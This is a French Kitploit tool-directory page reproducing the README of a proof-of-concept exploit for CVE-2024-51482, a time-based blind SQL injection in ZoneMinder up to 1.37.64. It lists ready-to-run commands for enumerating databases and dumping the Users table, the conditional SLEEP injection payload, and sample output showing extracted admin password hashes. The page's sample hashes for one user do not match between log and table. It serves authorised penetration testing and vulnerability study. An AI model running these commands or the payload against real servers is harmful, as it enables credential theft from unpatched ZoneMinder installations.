Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-51482-PoC — PoC d'injection SQL aveugle basée sur le temps avec authentification pour ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) | Kitploit
Outils/GitHubGitHub/plur1bu5/cve-2024-51482-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

PoC d'injection SQL aveugle basée sur le temps avec authentification pour ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)

Voir le dépôt
14il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-51482-PoC

Exploitation authentifiée d'injection SQL aveugle basée sur le temps pour ZoneMinder v1.37. <= 1.37.64*

Aperçu

Il s'agit d'une preuve de concept pour CVE-2024-51482, une vulnérabilité d'injection SQL aveugle basée sur le temps dans la fonctionnalité de gestion des événements de ZoneMinder. L'exploitation nécessite une authentification et utilise des requêtes SLEEP conditionnelles pour extraire des données de la base de données.

Fonctionnalités

  • Exploitation authentifiée - Connexion avec identifiants ou cookie de session Détection de longueur - Recherche binaire pour déterminer la longueur exacte de la chaîne avant extraction
  • Extraction parallèle - Extraction multi-threadée des caractères pour la rapidité
  • Options style sqlmap - Énumérer les bases de données, tables, colonnes et extraire les données
  • Valeurs par défaut sûres - Délai de 3s, 5 threads pour une haute précision
  • Suivi de progression - Progression d'extraction en temps réel avec mode verbeux
  • Sortie propre - Affichage formaté en tableau pour les données extraites

Prérequis

pip install requests

Démarrage rapide

Mode par défaut - Extraire les identifiants

python3 poc.py -t example.local -u admin -p password

Avec cookie de session

python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Mode verbeux

python3 poc.py -t example.local -u admin -p password -v

Utilisation

Énumérer les bases de données

python3 poc.py -t example.local -u admin -p password --dbs

Énumérer les tables

python3 poc.py -t example.local -u admin -p password -D zm --tables

Énumérer les colonnes

python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Extraire une table spécifique

python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Options

Requis :
  -t, --target TARGET       URL cible (IP, nom d'hôte ou URL complète)
  
Authentification :
  -u, --username USERNAME   Nom d'utilisateur pour l'authentification
  -p, --password PASSWORD   Mot de passe pour l'authentification
  --cookie COOKIE           Cookie de session (ZMSESSID)

Énumération :
  --dbs                     Énumérer les bases de données
  -D, --database DATABASE   Base de données à utiliser
  --tables                  Énumérer les tables
  -T, --table TABLE         Table à utiliser
  --columns                 Énumérer les colonnes
  --dump                    Extraire les données de la table

Performance :
  --delay DELAY             Délai en secondes (par défaut : 3, sûr)
  --threads THREADS         Nombre de threads (par défaut : 5, sûr)
  -v, --verbose             Afficher la progression de l'extraction

Réglage des performances

Mode sûr (recommandé)

python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • Vitesse : ~2-3 minutes par hachage de mot de passe
  • Précision : Élevée

Mode rapide (peut comporter des erreurs)

python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • Vitesse : ~30-60 secondes par hachage de mot de passe
  • Précision : Peut produire des caractères incorrects

Exemple de sortie

[*] Cible : http://example.local
[*] Délai : 3s | Threads : 5
[+] Authentifié en tant que admin
[*] Test de la vulnérabilité...
[+] La cible est VULNÉRABLE !

[*] Mode par défaut : Extraction des identifiants de zm.Users...
[*] Extraction des données de 'zm.Users'...
[+] Extrait : admin
[+] Extrait : $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extrait : john
[+] Extrait : $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Nom d'utilisateur | Mot de passe                                              |
====================================================================================
| admin             | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john              | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entrées extraites

Comment ça fonctionne

  1. Authentification - Se connecte avec des identifiants ou utilise un cookie de session fourni
  2. Test de vulnérabilité - Confirme que la cible est vulnérable avec une charge utile SLEEP simple
  3. Détection de longueur - Utilise une recherche binaire pour trouver la longueur exacte de la chaîne
  4. Extraction parallèle - Extrait toutes les positions de caractères simultanément
  5. Affichage des données - Formate les résultats dans un tableau propre

Format de la charge utile

L'exploitation utilise SLEEP conditionnel :

1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • Condition VRAIE : Aucun délai (0 seconde)
  • Condition FAUSSE : Délai complet (3 secondes)

Dépannage

Résultats inexacts

Si vous obtenez des caractères erronés (par exemple, $ devient 8) :

# Augmentez le délai et réduisez le nombre de threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Trop lent

Si l'extraction est trop lente :

# Diminuez le délai et augmentez le nombre de threads (peut réduire la précision)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

Aucune donnée trouvée

Si la table par défaut zm.Users n'existe pas :

# Énumérez d'abord les bases de données
python3 poc.py -t example.local -u admin -p password --dbs

# Ensuite, énumérez les tables
python3 poc.py -t example.local -u admin -p password -D nom_base_de_donnees --tables

Informations sur la CVE

  • ID CVE : CVE-2024-51482
  • Versions affectées : ZoneMinder v1.37.* <= 1.37.64
  • Corrigé dans : v1.37.65
  • Type de vulnérabilité : Injection SQL aveugle basée sur le temps
  • Score CVSS : À déterminer

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.

  • N'utilisez pas cet outil contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite de tester
  • L'accès non autorisé à des systèmes informatiques est illégal
  • L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil
  • Obtenez toujours une autorisation appropriée avant de mener des évaluations de sécurité

Références

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

Licence

Ce projet est fourni à des fins éducatives uniquement. Utilisez-le de manière responsable et éthique.


⭐ Si vous trouvez cela utile, veuillez étoiler le dépôt !

Télécharger l’outil